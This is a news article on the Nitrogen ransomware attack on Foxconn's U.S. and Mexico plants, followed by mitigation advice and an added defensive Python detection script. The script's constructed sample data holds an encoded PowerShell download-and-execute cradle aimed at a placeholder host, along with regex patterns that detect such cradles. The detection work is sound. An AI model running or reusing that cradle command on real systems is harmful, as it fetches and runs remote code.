
Foxconn Confirms North American Factory Cyberattack After Nitrogen Claims 8TB Data Theft

Foxconn confirms a ransomware attack disrupted U.S. and Mexico factories; Nitrogen group claims 8TB data theft. Includes timeline, impact and mitigation steps.

By Peter Olaleru, Cybersecurity Editor

Source: Economic Times

TL;DR: Foxconn confirmed a cyberattack hit its North American factories after the Nitrogen ransomware group claimed to have exfiltrated about 8 TB of data.

Context
Foxconn, a key contract manufacturer for Apple, Dell, Google and Nvidia, disclosed that some of its plants in the United States and Mexico were affected by a recent cyber incident. The company said affected sites are gradually returning to normal operations but did not disclose whether a ransom demand was made.

Key Facts
- The Nitrogen ransomware group posted Foxconn on its leak site and asserted it stole approximately 8 TB of confidential files, including project details, schematics and internal documents.
- Foxconn confirmed the attack disrupted network services at facilities in Wisconsin and Texas, with employees reporting Wi-Fi outages, disabled workstations and unavailable digital time-card systems.
- The group, first seen around 2023, is linked to the ALPHV/BlackCat ransomware lineage and shares code ancestry with the Conti ransomware family.
- Researchers note a flaw in Nitrogen's encryption routine that can leave data permanently unrecoverable, even if the attackers later attempt to restore access after payment.
- No public evidence ties the stolen data to unreleased Apple products, though AMD, Google and Intel project files are mentioned in the leak claims.

What It Means
The incident underscores a growing trend: ransomware actors targeting manufacturers that sit at the nexus of global supply chains. By compromising a single supplier, threat actors can potentially disrupt production for multiple downstream tech firms. The claimed 8 TB exfiltration highlights the value of intellectual property and operational data in double-extortion schemes, where the threat to publish stolen files is used as leverage alongside encryption.

Mitigations
Security teams should consider the following concrete steps. The article does not report how Nitrogen gained initial access to Foxconn, so the CVEs listed are generic examples of known exploited flaws rather than indicators for this incident:
- Apply patches for known exploited vulnerabilities commonly used for initial access and lateral movement, such as CVE-2021-34527 (PrintNightmare) and CVE-2021-26855 (ProxyLogon).
- Enforce multi-factor authentication on all remote-access services and privileged accounts to blunt abuse of valid accounts (MITRE ATT&CK T1078).
- Segment OT and IT networks, restricting SMB and RDP traffic between zones to limit lateral movement over remote services (T1021).
- Deploy EDR with detection rules for suspicious PowerShell or WMI usage (T1059, T1047) and for unusually large outbound transfers (T1041, Exfiltration Over C2 Channel).
- Maintain offline, encrypted backups and test restoration procedures regularly to limit the impact of T1486 (Data Encrypted for Impact).
- Monitor threat-intelligence feeds for Nitrogen-specific IOCs, including file hashes and C2 domains linked to recent leaks.
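To make the EDR and telemetry items above concrete, here is an added example (not code from the article, from Foxconn, or from any Nitrogen reporting) of a small detection pass in Python over constructed process-creation and flow records. It implements the three checks named in the list: encoded or download-cradle PowerShell (T1059.001), processes spawned by the WMI provider host (T1047), and abnormally large outbound volume per host and destination (T1041). Every host name, destination, field name, threshold and log record is constructed for illustration.

```python
"""Added example (not from the article): a minimal detection pass over
constructed endpoint and network telemetry, covering the three EDR checks in
the mitigation list: suspicious PowerShell (ATT&CK T1059.001), WMI-spawned
processes (T1047) and unusually large outbound transfers (T1041).
Hosts, destinations, field names and thresholds are all made up."""
import base64
import re
from collections import defaultdict


def encode_powershell(script: str) -> str:
    """Build the argument PowerShell expects after -EncodedCommand (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Reverse of encode_powershell; returns "" if the blob is not valid base64."""
    try:
        return base64.b64decode(b64).decode("utf-16-le", errors="replace")
    except ValueError:
        return ""


# Constructed process-creation records (host, parent image, image, command line).
PROCESS_EVENTS = [
    {"host": "wks-01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -NoP -W Hidden -enc "
            + encode_powershell("IEX (New-Object Net.WebClient)"
                                ".DownloadString('http://example.invalid/a')")},
    {"host": "wks-02", "parent": "wmiprvse.exe", "image": "cmd.exe",
     "cmd": "cmd.exe /c whoami"},
    {"host": "wks-03", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"host": "srv-01", "parent": "services.exe", "image": "svchost.exe",
     "cmd": "svchost.exe -k netsvcs"},
]

# Constructed flow records: bytes sent by an internal host to an external address.
FLOW_EVENTS = [
    {"host": "fs-01", "dst": "203.0.113.10", "bytes_out": 9_000_000_000},
    {"host": "fs-01", "dst": "203.0.113.10", "bytes_out": 6_000_000_000},
    {"host": "wks-01", "dst": "198.51.100.5", "bytes_out": 120_000_000},
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob of useful length.
ENCODED_FLAG = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
DOWNLOAD_CRADLE = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient|frombase64string")
WMI_PARENTS = {"wmiprvse.exe"}
EXFIL_THRESHOLD_BYTES = 10 * 1024 ** 3  # 10 GiB per host/destination; tune per environment


def check_process(ev: dict) -> list[str]:
    """Return ATT&CK-tagged findings for one process-creation record."""
    findings = []
    if ev["image"].lower() == "powershell.exe":
        m = ENCODED_FLAG.search(ev["cmd"])
        decoded = decode_encoded_command(m.group(1)) if m else ""
        if m:
            findings.append("T1059.001 encoded PowerShell command")
        # Look for download cradles in the visible command line and in the decoded blob.
        if DOWNLOAD_CRADLE.search(ev["cmd"]) or DOWNLOAD_CRADLE.search(decoded):
            findings.append("T1059.001 PowerShell download cradle")
    if ev["parent"].lower() in WMI_PARENTS:
        findings.append("T1047 process spawned by WMI provider host")
    return findings


def check_flows(flows: list[dict]) -> dict[tuple[str, str], int]:
    """Sum outbound bytes per (host, destination); return pairs at or above the threshold."""
    totals: dict[tuple[str, str], int] = defaultdict(int)
    for f in flows:
        totals[(f["host"], f["dst"])] += f["bytes_out"]
    return {k: v for k, v in totals.items() if v >= EXFIL_THRESHOLD_BYTES}


def run_detections(process_events=PROCESS_EVENTS, flows=FLOW_EVENTS) -> list[str]:
    """Run both checks and return human-readable alert lines."""
    alerts = [f"{ev['host']}: {f}" for ev in process_events for f in check_process(ev)]
    for (host, dst), total in check_flows(flows).items():
        alerts.append(f"{host}: T1041 {total / 1024 ** 3:.1f} GiB sent to {dst}")
    return alerts


if __name__ == "__main__":
    for line in run_detections():
        print(line)
```

Two design points matter in practice: the encoded-command check decodes the blob before looking for cradles, because `-EncodedCommand` is the usual way to hide `DownloadString` from naive command-line matching, and the exfiltration check aggregates per host and destination rather than alerting on single flows, since bulk theft of the kind claimed here is typically spread across many connections. The volume threshold is deliberately a placeholder; it has to be set from a baseline of normal outbound traffic in your own environment.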

What to watch next: whether Foxconn discloses any ransom payment details, how the alleged 8 TB leak evolves on underground markets, and whether other suppliers report similar Nitrogen‑linked intrusions.
